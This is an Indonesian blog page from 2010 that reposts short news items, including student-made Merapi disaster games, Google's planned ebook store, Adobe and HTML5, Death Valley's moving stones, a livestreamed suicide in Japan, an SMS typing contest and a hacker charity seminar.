Kalau didapati bersalah oleh pengadilan di Amerika, Nikolaenko dapat memperoleh hukuman kurungan hingga 5 tahun penjara.
READ MORE - Pria 23 Tahun Jadi Raja Spam Dunia

Bencana Gunung Merapi Bakal Dibikin Game

Rabu, 01 Desember 2010

SURABAYA - Bencana Merapi yang telah menelan ratusan orang dan puluhan ribu orang mengungsi, menjadi ide mahasiswa Teknik Informatika Institut Teknologi Sepuluh Nopember (ITS) membuat game. Namun  bukan sembarang game. Game yang dibuat mahasiswa ITS ini adalah  game edukasi bertujuan untuk menggugah kepedulian terhadap korban Merapi.

Game ini berbentuk visual novel, yang menggambarkan suasana bencana letusan Gunung Merapi. Ada dua game yang diperkenalkan yaitu Merapi Joe dan Merapi Boy. Bedanya untuk Merapi Joe bercerita tentang seseorang anak orang kaya raya asal Jakarta yang bernama Jonathan atau dipanggil Joe yang kemudian menjadi relawan.

Sedangkan yang Merapi Boy itu menceritakan warga Merapi yang menjadi korban Merapi kemudian menjadi relawan membantu menyelamatkan penduduk lainnya.

Game Merapi Joe dibuat oleh Iq Pulshashi, Retno Mumpuni, dan Putri Nikensasi. Sedangkan untuk Merapi Boy dikembangkan oleh Intan Dzikria dan Sangkurnia  Sekar Anom.

"Diharapkan dengan game ini masyarakat lebih peduli terhadap musibah yang menimpa penduduk disekitar Merapi. Setidaknya dengan game ini juga masyarakat diperlihatkan visualisasi bencana Merapi lewat foto-foto yang memang diambilkan dari inetrnet yang menggambarkan kondisi letusan Merapi," kata Imam Kuswardayan SKom MT, dosen pembimbing dan penggagas game edukas.

Selain itu juga bentuk visual novel memberikan pemahaman kepada masyarakat keputusan-keputusan yang diambil dan bagaimana akibatnya. Menurut Intan, mahasiswa pembuat game Merapi Boy game ini tersebut dibuat dengan alur cerita yang dihadapkan untuk memilih beberapa pilihan tetapi hanya satu pilihan yang alur ceritanya berakhir bahagia atau happy ending, sedangkan lainnya sad ending.
via okezone
READ MORE - Bencana Gunung Merapi Bakal Dibikin Game

Google Book Store Diluncurkan Akhir 2010

CALIFORNIA - Google Edition, toko buku online dari Google yang sudah dijanjikan sebelumnya oleh pihak Google, direncanakan akan diluncurkan pada akhir tahun 2010, berdasarkan laporan dari Wall Street Journal.

Google Edition akan memiliki metode penjualan yang berbeda dari kompetitor kebanyakan seperti Amazon Kindle store atau Apple iBookstore. Melalui bookstore-nya, dari pada membeli buku hanya di satu store, Google Edition membolehkan para penggunanya untuk membeli dari dari independent online store lainnya, dan memasukkannya ke dalam akun Google, yang mana membolehkan pengguna untuk membaca buku tersebut dimanapun dan dengan memakai perangkat apapun. Demikian seperti yang dikutip dari Mashable, Kamis (2/12/2010).

Awalnya, Googel Edition direncakan unutuk diluncurkan pada awal tahun 2010, tapi ternyata tidak jadi. Pada bulan Mei silam, Chris Palma, manager for strategic partner development dari Google juga mengatakan bahwa peluncuran Google Edition direncanakan peluncurannya pada bulan Juni atau Juli 2010.

Kini, Scott Dougall, product manager director dari Google, mengklaim bahwa Google Edition akan diluncurkan pada akhir tahun 2010 di AS, dan pada kuartal pertama tahun 2011 untuk pasar internasional. "Karena kompleksnya produk ini, maka kita tidak ingin produk ini keluar sebelum betul-betul beres," ujar Dougal.

Untuk peluncuran Google Edition nanti, rekan, pembagian revenue kepada para penerbit beserta para toko buku independen, sampai saat ini belum diketahui.
via okezone
READ MORE - Google Book Store Diluncurkan Akhir 2010

Ubah Imej, Miyabi Ganti Nama Pauline

Jumat, 26 November 2010

Maria Ozawa alias Miyabi kembali eksis dengan membintangi layar lebar horor Indonesia berjudul 'Hantu Tanah Kusir'. Bintang panas asal Jepang ini menjadi pemeran utama dalam film hasil karya rumah produksi Maxima Pictures itu.

Menurut Ody Mulya Hidayat, produser Maxima Pictures, Miyabi senang bisa bermain di film horor. Aktris cantik ini, lanjutnya, berniat untuk mengubah imej-nya sebagai bintang panas.

"Demi ubah imej, Miyabi juga sudah resmi ganti nama jadi Pauline. Nama ini khusus untuk karirnya di Indonesia, agar tidak menimbulkan kontroversi dan stigma yang macam-macam," ucap Ody saat dihubungi VIVAnews lewat telepon, 25 November 2010.

Nama Pauline ini juga dipakai untuk karakternya dalam film 'Hantu Tanah Kusir'. Dalam film itu, Miyabi atau Pauline, berlakon sebagai reporter asal Jepang yang ingin membuat penelitian tentang transportasi di Indonesia.

"Dia (Miyabi) mati-matian ingin mengubah imej-nya yang dianggap 'kotor' oleh masyarakat kita. Dia bilang lebih senang disebut sebagai bintang film horor, karena dia memang memulai karir sebagai aktris film horor," tambah Ody.

Ody menuturkan harapannya agar Miyabi atau Pauline bisa diterima di Indonesia. Karena, lanjutnya, aktris asal Jepang itu memiliki kualitas akting yang bagus untuk dikembangkan.

"Saya berharap semua pihak bisa mengerti dengan kondisi ini. Dia punya hak untuk bekerja di Indonesia. Toh dia datang ke sini untuk ubah imej dan sudah ganti nama menjadi Pauline. Demi menghilangkan imej Miyabi si 'bintang porno'," kata produser itu.
via vivanews
READ MORE - Ubah Imej, Miyabi Ganti Nama Pauline

Adobe Tak Takut Standar HTML5

Senin, 22 November 2010

NEW YORK - Masa jaya Adobe dengan Flash-nya dianggap akan habis akibat kehadiran standar HTML5 yang akan berkembang pesat. Namun Adobe ternyata punya pendapatnya sendiri.

CEO Adobe Shantanu Narayen mengatakan bahwa Flash tetap merupakan platform yang relevan, meskipun banyak preferensi untuk standar HTML5 berkembang pesat.

"Flash telah mengubah dunia. Bila Anda mengubah dunia dengan apa yang Anda sampaikan, tentu Anda akan mempunya penggemar dan pencela. Keduanya merupakan masukan bagi kami untuk berinovasi," kata Narayen, seperti dikutip TG Daily, Jumat (19/11/2010).

Narayen juga menekankan bahwa Adobe menyambut pengembang yang tertarik dalam merancang konten dan aplikasi untuk platform berganda.

"Benar, itu semua tentang bagaimana Anda mengontrol konten di Web. Tentu saja Adobe menciptakan alat terbaik untuk kedua HTML 5 dan Flash Ini," tambahnya.

Namun Narayen mengakui bahwa Flash agak sulit untuk port yang lebih kecil, seperti perangkat mobile.

"Namun yang jelas, video web akan menjadi besar. Dan dalam hal ini, Flash lebih baik, atau sama, dengan kekuatan teknologi apapun di luar sana," klaimnya.
via okezone
READ MORE - Adobe Tak Takut Standar HTML5

Misteri Batu-batu Berjalan di California

Minggu, 21 November 2010

Batu-batu di permukaan danau kering ini bisa berpindah tempat yang disertai jejaknya.
 
VIVAnews - Pernah dengar misteri batu meluncur atau batu berjalan? Ya, batu berjalan menjadi salah satu misteri yang paling menarik dari Death Valley National Park, tepatnya di danau kering Racetrack Playa, California-AS. Batu berjalan itu dapat ditemukan dengan mudah di permukaan Playa dengan jejak panjang di belakangnya.

Bagaimana mereka dapat bergerak atau berpindah masih menjadi misteri besar di benak para peneliti. Pasalnya, batu yang berjalan tidak hanya batu kecil yang mudah tertiup oleh angin. Ada beberapa batu besar dengan berat ratusan kilogram yang juga turut "jalan-jalan".

Pertanyaan besar yang tentu saja akan muncul kemudian: bagaimana cara mereke bergerak? Ini menjadi tantangan besar bagi para peneliti. Mengapa fenomena ini menjadi misteri? Karena, tidak ada satu orang pun yang pernah melihat ia berjalan.

Sampai hari ini, faktanya adalah tidak ada seorang atau satu organisasi pun yang mengetahui bagaimana batu-batu itu bisa berpindah tempat, meski beberapa orang sudah mempunyai penjelasannya masing-masing menurut nalar. Menarik untuk disimak.

Batu berjalan di Racetrack PlayaTapi, sebelumnya, sekadar diketahui apa dan di mana Racetrack Playa. Racetrack Playa adalah danau kering yang datar dengan panjang empat kilometer dan lebar sekitar dua kilometer. Terletak di California-AS, permukaannya terdiri dari batuan sedimen yang terbuat dari lumpur dan tanah liat.

Iklim di daerah ini juga kering. Hujan hanya terjadi beberapa inci per tahun. Namun, saat hujan, pegunungan terjal yang mengelilingi Racetrack Playa akan menyuplai air ke permukaan danau dan menyulapnya menjadi danau dangkal yang sangat luas. Sayangnya, ini hanya bertahan beberapa hari saja. Setelah itu, dalam keadaan basah, permukaannya berubah menjadi lumpur yang lembut dan licin.

Ada beberapa asumsi atau penjelasan tentang mengapa batu-batu di Racetrack Playa dapat berjalan. Semua penjelasan tersebut masuk akal. Bisa jadi Anda setuju dengan salah satunya. Namun, sampai saat ini belum ada yang dapat membuktikannya bersama-sama secara ilmiah.

Apakah mereka digerakkan oleh manusia atau hewan?
Jejak yang terbentuk di belakang batu menunjukkan bahwa batu-batu berjalan itu berpindah saat permukaan Racetrack Playa masih ditutupi dengan lumpur yang sangat lembut. Dan, di sekitar jejak batu, tidak ada lumpur yang rusak akibat jejak makhluk hidup lainnya. Artinya, sangat kecil kemungkinan batu tersebut dipindahkan oleh manusia dan hewan.

Apakah mereka digerakkan oleh angin?
Ini penjelasan paling favorit dan dipilih banyak orang karena dinilai paling mungkin. Bukan asal tebak atau sekedar menerka-nerka. Tapi, jika dipelajari dari jejak batu yang berjalan, arahnya sejajar dengan arah angin yang berhembus di Racetrack Playa, yakni dari barat daya ke arah timur laut.

Hembusan angin kencang diperkirakan mampu menyenggol batu sampai berpindah tempat. Kurva pada jejak batu tersebut dibentuk oleh pergeseran arah angin yang membawanya, karena interaksi angin dan batu tidak teratur.

Batu berjalan di Racetrack PlayaApakah mereka digerakkan oleh es?
Beberapa orang mengaku sempat menyaksikan Racetrack Playa tertutup oleh lapisan es tipis. Idenya, air membeku di sekitar batu. Lalu, angin berhembus di atas permukaan es dan menyeret lapisan es berikut batu yang tertancap di permukaan es.

Beberapa penelitian telah menemukan jejak sangat kongruen pada beberapa batu. Namun, seharusnya pengangkutan lapisan es besar diharapkan meninggalkan tanda para permukaan Playa. Sampai saat ini, tanda tersebut belum bisa dibuktikan.

Mungkin Anda setuju dengan salah satu dari beberapa penjelasan di atas. Atau, tidak ada salahnya jika Anda mempunyai penjelasan lain yang berbeda. Tetapi, mungkin cerita ini akan tetap menarik jika jawabannya tidak pernah diketahui dan menjadi misteri.
READ MORE - Misteri Batu-batu Berjalan di California

Pelaku Streaming Proses Bunuh Diri di Internet

Kamis, 11 November 2010


TOKYO - Pernah melihat film bertajuk 'Untraceable'? Kejadian yang satu ini hampir mirip dengan film tersebut. Bedanya, pelaku membunuh dirinya sendiri.

Pada film 'Untraceable' pelaku mempersiapkan peralatan sedemikian rupa yang akan secara otomatis membunuh korban perlahan-lahan dengan mengandalkan trafik pengunjung di sebuah situs streaming online. Semakin banyak pengunjung yang masuk ke situs streaming tersebut, semakin cepat korban meninggal.

Kejadian di Jepang hampir mirip dengan film tersebut. Namun bedanya, sang pelaku menstreaming proses membunuh dirinya sendiri secara online. Saat wajahnya mulai disiarkan di situs streaming online Ustream dan ia mengumumkan akan bunuh diri, banyak pengunjung yang mendesaknya untuk melakukan hal tersebut.

Desakan ini muncul karena kebanyakan para pengunjung yakin bahwa siaran ini hanyalah sebuah lelucon. Bahkan banyak pengunjung yang menyangsikan pelaku akan benar-benar bunuh diri.

Dilansir melalui Techeye, seperti dikutip dari harian Jepang Yomiuri Shimbun, Kamis (11/11/2010), lelaki yang hidup sendirian di Jepang itu merupakan pengangguran yang baru di PHK dari tempat kerjanya pada Agustus lalu. Ia sempat mengeluarkan uneg-unegnya di sebuah blog. Rasa putus asa membuat ia akhirnya memutuskan untuk bunuh diri dengan cara yang unik, memperlihatkan proses bunuh diri ke semua teman-temannya di internet.

Mayatnya baru ditemukan polisi dua hari kemudian. Polisi menemukan banyak pesan yang dilayangkan kepada pelaku untuk mendesaknya segera bunuh diri.

Meski telah mati, semakin banyak pengunjung yang datang ke Ustream untuk melihat mayatnya. Sampai akhirnya Ustream harus menghentikan sendiri siaran tersebut, satu jam setelah mayatnya ditemukan.
via okezone
 
READ MORE - Pelaku Streaming Proses Bunuh Diri di Internet

Pengetik SMS Tercepat dari Indonesia

Minggu, 07 November 2010


JAKARTA - Dua warga Jakarta Norman Kosasih dan Andy, dinobatkan menjadi pemilik jari tercepat dari Indonesia. Kepastian ini diperoleh setelah keduanya menjadi pemenang dalam final LG Mobile Worldcup 2010,sebuah ajang pencarian pengetik sms tercepat tingkat dunia.

Ajang final ini mempertemukan 32 finalis yang dipilih dari catatan waktu terbaik se-Indonesia. Keduanya juga akan didapuk menjadi wakil Indonesia untuk bersaing kembali pada tingkat final dunia dalam ajang yang sama di New York, Amerika Serikat, Januari mendatang.

"Keduanya berhasil membuktikan diri sebagai yang terbaik diantara finalis lainnya. LG Mobile sangat bangga dapat memberikan penghargaan ini bagi para pemenang," ujar Kim Weon Dae, Presiden Direktur PT. LG Electronics Indonesia dalam keterangannya, Jumat (5/10/2010).

LG Mobile Worldcup 2010 merupakan gelaran besar tahunan berskala global hasil kerja LG Mobile sebagai salah satu vendor handphone global, yang berpusat pada pencarian individu dengan kemampuan tercepat dalam berkirim pesan singkat (SMS) sedunia. Tercatat 25 negara menjadi peserta termasuk Indonesia pada penyelenggaraannya tahun ini. 

Di Indonesia, kegiatan ini resmi dibuka 2 Oktober 2010 silam dan tercatat diikuti 133,196 peserta dari seluruh Indonesia. Jumlah peserta ini meningkat 60 persen dari tahun sebelumnya. Hadiah utama 100 juta rupiah tersedia bagi pemenang utama putaran kejuaraan nasional di Indonesia.
Norman Kosasih, mahasiswa berusia 19 tahun, sebagai pemenang utama dalam ajang ini tak dapat menyembunyikan kegembiraan sesaat begitu dirinya meraih waktu terbaik pada laga akhir kompetisi ini. Meski mengaku jarang ber-sms, menyatakan mendapatkan kecepatan mengetik di handphone ini dari kebiasaan uniknya mencatat syair sebuah lagu sembari mendengarkan lagu tersebut via handphone melalui fasilitas multitasking.

"Saya hobby mendengarkan musik. Untuk mengingat syairnya saya biasa mengetik dalam fasilitas notes di handphone sembari mendengarkan lagunya. Tak menyangka hal ini yang membawa saya menjadi pemenang dalam LG Mobile Worldcup," ujar Norman nya yang juga tercatat sebagai salah satu agen asuransi.

Lain halnya dengan Andy, pemuda 23 tahun, yang duduk sebagai pemenang kedua, berambisi menjadi pemenang dalam final tingkat dunia LG Mobile Worldcup di New York pada Januari mendatang.

Bicara mengenai mula keikutsertaannya dalam LG Mobile Worldcup 2010, Andy menyatakan mengetahui ajang ini atas informasi seorang teman yang mendapatkannya dari akun jejaring sosial LG Mobile di Facebook. Tertarik dengan kompetisi ini, dirinya langsung terus berlatih mengetik sms cepat via fasilitas WAP di handphonenya. "Selain itu, kebiasaan chatting melalui handphone dengan teman dan rekan kerja melatih kecepatan saya mengetik pesan melalui handphone
via okezone
READ MORE - Pengetik SMS Tercepat dari Indonesia

Hacker pun Peduli Korban Bencana Merapi


JAKARTA - Hacker tidak melulu identik dengan aksi kejahatan di dunia cyber. Di tengah bencana yang terjadi, sekelompok komunitas yang menamakan diri sebagai hacker mencoba menggalang dana bantuan.

Dana tersebut telah terkumpul pada 1 November lalu melalui sebuah acara seminar Hacking untuk Amal. Komunitas yang dibentuk dari group Facebook Hacking untuk Amal ini sudah beranggotakan sekira 281 orang.

Acara yang digelar selama hampir seharian dan mengambil tempat di salah satu restoran di Yogyakarta ini berhasil mengumpulkan dana sekira Rp1.350.000. Dana tersebut sudah disalurkan dengan baik ke salah satu posko pengungsi yang dianggap layak menerima bantuan.

"Dari dana yang terkumpul panitia membelanjakan kerperluan berupa perlengkapan bayi dan perempuan, selimut, matras, ember dan gelas plastik. Berdasarkan survei dari panitia maka di putuskan memberikan bantuan ke posko Pengungsi di MTSN 1 Pakem Yogyakarta," ujar Adi Nugroho, founder Muslim Hacker yang juga menjadi salah satu penggagas acara tersebut, kepada okezone, Sabtu (6/11/2010).

Selain dirinya, beberapa pembicara lain yang ikut mendukung acara ini adalah Pawiro, praktisi networking yang juga aktivis dari forum Yogyafree, dan Mada Rambu Perdana seorang analis digital forensik.

Menurut Adi, tujuan akhir dari Acara Seminar Hacking Untuk Amal ialah semata-mata karena niat awal para anggota group Hacking Untuk Amal, sebagai bentuk keprihatianan rasa kepedulian terhadap korban bencana yang baru-baru ini terjadi.

Ditambahkannya, tidak menutup kemungkinan acara seperti ini akan dilakukan kembali dengan tujuan yang sama, membantu korban bencana.
via okezone.com
 
READ MORE - Hacker pun Peduli Korban Bencana Merapi

 
 
 

Followers